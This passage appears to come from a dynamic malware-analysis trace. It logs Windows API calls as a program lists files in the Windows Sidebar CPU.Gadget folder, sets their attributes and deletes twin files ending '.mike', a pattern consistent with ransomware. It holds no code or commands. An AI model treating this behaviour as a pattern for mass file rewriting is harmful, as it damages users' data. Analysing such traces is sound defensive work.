dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.849] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1216, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.html", cAlternateFileName="")) returned 1 [0103.849] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0103.849] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0103.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0103.850] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0103.850] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.851] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html", lpFilePart=0x0) returned 0x42 [0103.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.mike", lpFilePart=0x0) returned 0x47 [0103.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html", dwFileAttributes=0x80) returned 0 [0103.857] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html.mike")) returned 1 [0103.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", lpFilePart=0x0) returned 0x44 [0103.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", lpFilePart=0x0) returned 0x44 [0103.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", lpFilePart=0x0) returned 0x44 [0103.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", lpFilePart=0x0) returned 0x44 [0103.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.mike", lpFilePart=0x0) returned 0x49 [0103.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml", dwFileAttributes=0x80) returned 0 [0103.868] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\gadget.xml.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\gadget.xml.mike")) returned 1 [0103.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x7327aa0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x734dc00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1216, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.html", cAlternateFileName="")) returned 1 [0103.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0103.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0103.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0103.869] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.870] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.870] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0103.870] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.870] CoTaskMemFree (pv=0x506980) [0103.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0103.870] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.870] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 1 [0103.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.871] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 1 [0103.871] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 0 [0103.871] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.872] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0103.872] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.872] CoTaskMemFree (pv=0x506980) [0103.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0103.872] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.873] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x47ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.js", cAlternateFileName="")) returned 1 [0103.873] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.873] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.873] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.873] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x47ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.js", cAlternateFileName="")) returned 1 [0103.873] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x47ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.js", cAlternateFileName="")) returned 0 [0103.874] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0103.874] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0103.874] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.874] CoTaskMemFree (pv=0x506980) [0103.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8057bdba, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8057bdba, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290d46f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x42e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="back.png", cAlternateFileName="")) returned 1 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6651, dwReserved0=0x0, dwReserved1=0x0, cFileName="back_lrg.png", cAlternateFileName="")) returned 1 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290fa853, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x290fa853, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x15a, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial.png", cAlternateFileName="")) returned 1 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc91, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot.png", cAlternateFileName="")) returned 1 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xfca, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialdot_lrg.png", cAlternateFileName="")) returned 1 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84291931, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84291931, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg.png", cAlternateFileName="")) returned 1 [0103.876] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84291931, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84291931, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291209b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_lrg_sml.png", cAlternateFileName="")) returned 1 [0103.877] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8426b7d4, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8426b7d4, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291209b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial_sml.png", cAlternateFileName="")) returned 1 [0103.877] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x134, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass.png", cAlternateFileName="")) returned 1 [0103.877] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84303d48, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84303d48, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="glass_lrg.png", cAlternateFileName="")) returned 1 [0103.877] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.884] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png", lpFilePart=0x0) returned 0x43 [0103.885] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.mike", lpFilePart=0x0) returned 0x48 [0103.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png", dwFileAttributes=0x80) returned 0 [0103.891] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png.mike")) returned 1 [0103.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows 